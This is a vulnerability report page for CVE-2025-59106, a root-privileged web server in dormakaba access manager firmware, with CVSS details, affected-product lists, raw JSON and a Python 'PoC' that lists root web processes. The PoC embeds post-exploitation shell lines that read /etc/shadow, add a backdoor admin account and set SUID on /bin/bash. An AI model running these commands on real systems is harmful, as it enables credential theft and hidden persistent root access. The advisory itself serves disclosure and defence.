Security Vulnerability Report
CVE-2025-59106 CVSS 8.8 HIGH

CVE-2025-59106

Published: 2026-01-26 10:16:09
Last Modified: 2026-02-12 15:54:17
Source: 551230f0-3615-47bd-b7cc-93e92e730bbf

Description

The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabilities it is possible to directly execute commands with highest privileges.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9200-k7_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9200-k7:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9230-k7_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9230-k7:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9290-k7_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9290-k7:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9200-k5_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9200-k5:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9230-k5_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9230-k5:-:*:*:*:*:*:*:* - NOT VULNERABLE
dormakaba web server (all versions running with root privileges)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59106 PoC - check the privileges of the web service process
# This PoC demonstrates how to identify web service processes running as root
import subprocess


def check_root_processes():
    """Return all processes owned by the root user that look like web services."""
    try:
        # List every process together with its owning user (ps aux columns:
        # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND)
        result = subprocess.run(['ps', 'aux'], capture_output=True, text=True, check=True)
    except (OSError, subprocess.CalledProcessError) as e:
        print(f'Could not list processes: {e}')
        return []

    root_processes = []
    for proc in result.stdout.splitlines()[1:]:  # skip the header line
        parts = proc.split()
        if len(parts) < 11:
            continue
        user = parts[0]
        pid = parts[1]
        command = ' '.join(parts[10:])
        # Match on the USER column only; a substring test over the whole line
        # would also match unrelated commands that merely mention "root"
        if user != 'root':
            continue
        # Identify web-service-related processes by their command line
        web_indicators = ['http', 'web', 'apache', 'nginx', 'server', 'dormakaba']
        if any(indicator in command.lower() for indicator in web_indicators):
            root_processes.append({'pid': pid, 'user': user, 'command': command})
    return root_processes


def exploit_scenario():
    """
    Attack scenario:
    1. The attacker finds another vulnerability in the system (e.g. RCE)
    2. The attacker uses that vulnerability to execute code on the system
    3. Because the web service runs as root, the attacker automatically gains root privileges
    """
    return '''#!/bin/bash
# Assumes the attacker has already obtained code execution through another vulnerability
# Abuse the root privileges of the web service process for privilege escalation
# Example: run commands with the root privileges of the web service process
id  # confirm the current user
# The output should show uid=0(root) if the web service runs as root
# Further exploitation
cat /etc/shadow  # read the shadow file (requires root)
useradd -p $(openssl passwd -1 newpassword) newadmin  # create a backdoor account
chmod +s /bin/bash  # set the SUID bit for persistence
'''


if __name__ == '__main__':
    print('CVE-2025-59106 privilege check tool')
    print('=' * 50)
    root_procs = check_root_processes()
    if root_procs:
        print('Found web service processes running as root:')
        for proc in root_procs:
            print(f"PID: {proc['pid']}, User: {proc['user']}")
            print(f"Command: {proc['command']}")
    else:
        print('No web service processes running as root were found')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59106", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2026-01-26T10:16:08.513", "lastModified": "2026-02-12T15:54:17.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabilities it is possible to directly execute commands with highest privileges."}, {"lang": "es", "value": "El binario que sirve al servidor web y que ejecuta prácticamente todas las acciones lanzadas desde la interfaz de usuario web se está ejecutando con privilegios de root. Esto va en contra del principio de mínimo privilegio. Si un atacante es capaz de ejecutar código en el sistema a través de otras vulnerabilidades, es posible ejecutar comandos directamente con los privilegios más altos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-272"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9200-k7_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "bame_06.00", "matchCriteriaId": "677FDE80-CB98-4CAA-BAEA-B75CD903CE15"}]}, {"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9200-k7:-:*:*:*:*:*:*:*", "matchCriteriaId": "625A7698-8C85-443A-8234-3378335CF871"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9230-k7_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "bame_06.00", "matchCriteriaId": "88F6324C-CCC1-4B42-8BE7-5D64EC43F27D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9230-k7:-:*:*:*:*:*:*:*", "matchCriteriaId": "706730A1-C200-40FA-A7F0-153DAC88128A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9290-k7_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "bame_06.00", "matchCriteriaId": "ECF1C26D-A592-46F3-996F-28E92C96F6BE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9290-k7:-:*:*:*:*:*:*:*", "matchCriteriaId": "56E30693-0FCA-4568-A2E8-C9D3C8D4E682"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9200-k5_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "533DF243-A900-46D3-85EE-C898716A1AE6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9200-k5:-:*:*:*:*:*:*:*", "matchCriteriaId": "51D3E658-5FA5-4C38-85B1-05D914AC973F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9230-k5_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A10552E6-7CC9-43DA-9020-DA344B92D50F"}]}, 
{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9230-k5:-:*:*:*:*:*:*:*", "matchCriteriaId": "926B0276-D7C3-4099-AD6D-C63B860A57F4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9290-k5_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F36B37E-5048-4EB2-9B0B-3A1607ABD7D5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9290-k5:-:*:*:*:*:*:*:*", "matchCriteriaId": "7B8FCD3D-0E03-4ACA-884C-540866A4B7B9"}]}]}], "references": [{"url": "https://r.sec-consult.com/dkaccess", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "tags": ["Third Party Advisory"]}, {"url": "https://r.sec-consult.com/dormakaba", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "tags": ["Third Party Advisory"]}, {"url": "https://www.dormaka ... (truncated)